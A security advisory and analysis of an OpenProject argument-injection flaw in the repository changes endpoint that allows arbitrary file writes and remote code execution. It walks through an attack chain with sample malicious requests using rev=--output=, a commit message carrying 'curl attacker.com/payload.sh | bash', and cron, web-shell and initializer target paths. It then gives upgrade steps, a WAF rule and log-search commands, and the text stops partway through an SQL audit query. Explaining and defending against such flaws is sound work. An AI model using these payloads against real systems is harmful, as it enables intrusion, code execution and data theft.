Description
OpenProject is an open-source, web-based project management software. Prior to versions 16.6.7 and 17.0.3, an arbitrary file write vulnerability exists in OpenProject’s repository changes endpoint (/projects/:project_id/repository/changes) when rendering the “latest changes” view via git log. By supplying a specially crafted rev value (for example, rev=--output=/tmp/poc.txt), an attacker can inject git log command-line options. When OpenProject executes the SCM command, Git interprets the attacker-controlled rev as an option and writes the output to an attacker-chosen path. As a result, any user with the :browse_repository permission on the project can create or overwrite arbitrary files that the OpenProject process user is permitted to write. The written contents consist of git log output, but by crafting custom commits the attacker can still upload valid shell scripts, ultimately leading to RCE. The RCE lets the attacker create a reverse shell to the target host and view confidential files outside of OpenProject, such as /etc/passwd. This issue has been patched in versions 16.6.7 and 17.0.3.
EPSS Score:
0%
EUVD-2026-5556: Critical Command Injection Vulnerability in OpenProject
Executive Summary
EUVD-2026-5556 represents a critical command injection vulnerability in OpenProject's repository management functionality that enables arbitrary file write operations and remote code execution (RCE). With a CVSS 4.0 base score of 9.4 (Critical), this vulnerability poses a severe threat to organizations utilizing OpenProject for project management, particularly within European infrastructure.
1. Vulnerability Assessment and Severity Evaluation
Technical Classification
- Vulnerability Type: Command Injection / Arbitrary File Write
- CWE Classification: CWE-77 (Command Injection), CWE-73 (External Control of File Name or Path)
- CVSS 4.0 Score: 9.4 (Critical)
- Attack Complexity: Low (AC:L)
- Privileges Required: Low (PR:L) - Only :browse_repository permission needed
Severity Justification
The critical severity rating is warranted due to:
- Low Attack Complexity: Exploitation requires only basic repository browsing permissions
- Complete System Compromise: Full confidentiality, integrity, and availability impact (VC:H/VI:H/VA:H)
- Subsequent System Impact: High impact on subsequent systems (SC:H/SI:H/SA:H)
- Network Attack Vector: Remotely exploitable without user interaction (AV:N/UI:N)
- RCE Capability: Direct path to remote code execution and reverse shell establishment
Risk Context
This vulnerability is particularly dangerous because:
- It affects a widely-deployed open-source project management platform
- The attack surface is exposed to any authenticated user with minimal permissions
- Exploitation can lead to complete infrastructure compromise
- The vulnerability allows lateral movement and data exfiltration beyond the application scope
2. Potential Attack Vectors and Exploitation Methods
Attack Chain Analysis
Stage 1: Initial Access
Attacker Requirements:
- Valid OpenProject account
- :browse_repository permission on any project
- Network access to the OpenProject instance
Stage 2: Command Injection
The vulnerability exists in the repository changes endpoint:
/projects/:project_id/repository/changes
Exploitation Mechanism:
# Malicious request example
GET /projects/vulnerable-project/repository/changes?rev=--output=/tmp/malicious.sh
# Git command executed by OpenProject
git log --output=/tmp/malicious.sh [other parameters]
The rev parameter is insufficiently sanitized, allowing injection of git command-line options.
Stage 3: Arbitrary File Write
By controlling the --output flag, attackers can:
- Write files to any location accessible to the OpenProject process user
- Overwrite existing configuration files
- Place malicious scripts in executable directories
- Modify application code or templates
Stage 4: Content Crafting
While the written content is git log output, attackers can:
# Create specially crafted commits with malicious payloads
git commit -m "#!/bin/bash
curl attacker.com/payload.sh | bash
# Legitimate-looking commit message"
The git log output containing these commit messages becomes valid shell script content.
Stage 5: Remote Code Execution
Method 1: Cron Job Injection
# Write to cron directory
rev=--output=/etc/cron.d/malicious
Method 2: Web Shell Deployment
# Write to web-accessible directory
rev=--output=/var/www/openproject/public/shell.php
Method 3: Process Hijacking
# Overwrite startup scripts or configuration files
rev=--output=/opt/openproject/config/initializers/malicious.rb
Stage 6: Post-Exploitation
Once RCE is achieved:
- Establish reverse shell connection
- Enumerate system information (
/etc/passwd,/etc/shadow) - Access database credentials
- Pivot to connected systems
- Exfiltrate sensitive project data
- Establish persistence mechanisms
Practical Exploitation Scenario
POST /projects/target-project/repository/changes HTTP/1.1
Host: openproject.victim.eu
Cookie: _openproject_session=<valid_session>
Content-Type: application/x-www-form-urlencoded
rev=--output=/tmp/stage1.sh
# Subsequent request after crafting malicious commits
# The git log output now contains executable shell code
# Attacker triggers execution through various methods
3. Affected Systems and Software Versions
Vulnerable Versions
OpenProject versions affected:
- All versions < 16.6.7 (Legacy branch)
- All versions < 17.0.3 (Current branch)
Specific Version Ranges
Vulnerable:
- 16.0.0 - 16.6.6
- 17.0.0 - 17.0.2
- All earlier versions
Patched:
- 16.6.7 and later (16.x branch)
- 17.0.3 and later (17.x branch)
Deployment Scenarios at Risk
- Self-hosted Installations: Organizations running OpenProject on-premises
- Docker Deployments: Containerized instances with vulnerable versions
- Cloud Deployments: IaaS/PaaS hosted instances
- Development Environments: Often overlooked but equally vulnerable
European Infrastructure Impact
Given OpenProject's popularity in European organizations:
- Public Sector: Government agencies using OpenProject for project coordination
- Critical Infrastructure: Energy, transportation, and healthcare sectors
- Research Institutions: Universities and research facilities
- SMEs: Small and medium enterprises across EU member states
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1 - Within 24 Hours)
1. Version Upgrade
# For version 16.x users
Upgrade to: OpenProject 16.6.7 or later
# For version 17.x users
Upgrade to: OpenProject 17.0.3 or later
Upgrade Resources:
- Release v16.6.7: https://github.com/opf/openproject/releases/tag/v16.6.7
- Release v17.0.3: https://github.com/opf/openproject/releases/tag/v17.0.3
2. Emergency Workarounds (If immediate patching is not possible)
Option A: Disable Repository Functionality
# In config/configuration.yml
scm:
disabled: true
Option B: Restrict Repository Permissions
-- Temporarily revoke :browse_repository permission
UPDATE role_permissions
SET permission = NULL
WHERE permission = 'browse_repository';
Option C: Web Application Firewall (WAF) Rules
# Nginx/ModSecurity rule example
SecRule ARGS:rev "@rx --" \
"id:1000,\
phase:2,\
deny,\
status:403,\
msg:'Potential command injection in rev parameter'"
Short-term Actions (Priority 2 - Within 72 Hours)
3. Security Audit
- Review access logs for suspicious
revparameter patterns:
grep -E "rev=--" /var/log/openproject/production.log
grep -E "repository/changes.*--output" /var/log/nginx/access.log
- Check for unauthorized file modifications:
find /opt/openproject -type f -mtime -30 -ls
find /tmp -name "*.sh" -mtime -7 -ls
4. Incident Response Procedures
- Isolate potentially compromised instances
- Conduct forensic analysis of affected systems
- Review user accounts with :browse_repository permissions
- Analyze git commit history for suspicious patterns
5. Access Control Review
-- Audit users with repository access
SELECT u.login, r.name, p.name
FROM users u
JOIN member_roles mr ON u.id = mr.member_id
JOIN roles r ON mr.role_id = r.id
JOIN role_permissions